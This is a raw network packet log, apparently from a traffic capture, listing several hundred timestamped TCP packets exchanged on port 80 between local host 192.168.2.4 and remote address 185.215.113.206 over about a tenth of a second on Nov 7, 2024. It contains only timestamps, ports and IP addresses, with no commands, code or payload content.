Nov 7, 2024 04:12:20.990345955 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.990379095 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.990499020 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.990509987 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.990520954 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.990542889 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.990552902 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.990562916 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.990570068 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.990591049 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.990598917 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.990638018 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.990662098 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.990673065 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.990703106 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.990724087 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.990725040 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.990736961 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.990747929 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.990760088 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.990770102 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.990792036 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.990822077 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.990892887 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.990904093 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.990912914 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.990926027 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.990926981 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.990946054 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.990946054 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.990968943 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.990969896 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.990982056 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.990994930 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.990998983 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991014957 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991015911 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991027117 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991036892 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991039038 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991049051 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991055965 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991060972 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991075993 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991082907 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991086960 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991097927 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991099119 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991111040 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991127968 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991148949 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991149902 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991161108 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991169930 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991177082 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991183043 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991184950 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991205931 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991214037 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991218090 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991229057 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991245985 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991256952 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991266012 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991275072 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991286039 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991296053 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991317987 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991337061 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991345882 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991358042 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991368055 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991384029 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991389036 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991394997 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991395950 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991405964 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991416931 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991420984 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991434097 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991457939 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991496086 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991507053 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991516113 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991534948 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991534948 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991553068 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991563082 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991568089 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991579056 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991588116 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991592884 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991599083 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991615057 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991615057 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991626024 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991627932 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991640091 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991651058 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991656065 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991668940 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991677999 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991681099 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991689920 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991694927 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991707087 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991715908 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991719007 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991728067 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991739035 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991744041 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991756916 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991780043 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991786003 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991791964 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991803885 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991813898 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991830111 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991843939 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991848946 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991859913 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991863966 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991869926 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991882086 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991892099 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991893053 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991905928 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991914988 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991918087 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991924047 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991926908 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991938114 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991944075 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991955996 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991964102 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991964102 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.991966009 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991978884 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991990089 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.991996050 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.992005110 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.992023945 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.992033958 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.992036104 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.992046118 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.992058039 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.992063999 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.992086887 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.992108107 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.993077040 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993088007 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993098021 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993112087 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993120909 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993124008 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.993133068 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993145943 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.993160963 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.993185997 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.993371964 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993382931 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993393898 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993421078 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.993421078 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.993469954 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993480921 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993491888 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993514061 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.993526936 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.993570089 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993587971 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993597984 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993622065 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.993647099 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.993662119 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993674040 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993707895 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.993737936 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993748903 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993758917 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993769884 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.993797064 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.993824005 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993834972 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993860960 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.993881941 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.993891954 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993901968 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.993936062 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.994075060 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994103909 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994118929 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994119883 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.994138002 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.994154930 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994157076 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.994167089 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994177103 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994196892 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.994225025 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.994318962 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994329929 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994339943 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994353056 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994359970 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.994373083 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.994374037 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994398117 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.994426012 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.994524956 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994535923 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994546890 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994565964 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.994574070 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.994589090 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994599104 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.994600058 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994611979 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994627953 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.994656086 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.994756937 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994776011 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994786024 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994795084 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.994801998 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994812965 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994817019 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.994834900 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.994851112 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.994923115 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994955063 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.994956970 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994970083 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994992018 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.994996071 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.995008945 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.995028973 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.995047092 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.995122910 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.995131969 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.995142937 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.995146036 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.995162964 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.995167971 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.995173931 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.995181084 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.995187044 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.995223045 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.995249033 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.995270967 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.995282888 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.995291948 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.995316029 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.995321989 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.995333910 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.995343924 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.995357037 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.995364904 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.995382071 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.995409966 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.995438099 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.995449066 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.995471001 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.995476007 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.995486975 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.995496988 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.995496988 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.995506048 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.995516062 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:20.995532036 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.995537043 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:20.995554924 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.105362892 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.105382919 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.105393887 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.105447054 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.105621099 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.105631113 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.105643034 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.105659008 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.105663061 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.105671883 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.105681896 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.105683088 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.105698109 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.105709076 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.105714083 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.105720043 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.105731964 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.105746031 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.105757952 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.105762959 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.105783939 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.105806112 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.105973959 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.105984926 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.105993986 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106005907 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106014967 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.106019020 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106041908 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.106055975 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.106076002 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106086969 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106097937 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106120110 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.106149912 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.106224060 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106241941 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106252909 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106261969 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106273890 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106287003 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.106312037 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.106338978 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106350899 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106359959 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106372118 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106383085 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106384039 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.106395006 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106401920 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.106417894 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.106442928 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106446981 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.106455088 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106478930 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106478930 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.106492996 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106498957 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.106506109 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106513977 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.106517076 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106528997 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106529951 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.106549025 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.106549978 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106563091 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106574059 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.106575012 CET	49755	80	192.168.2.4	185.215.113.206
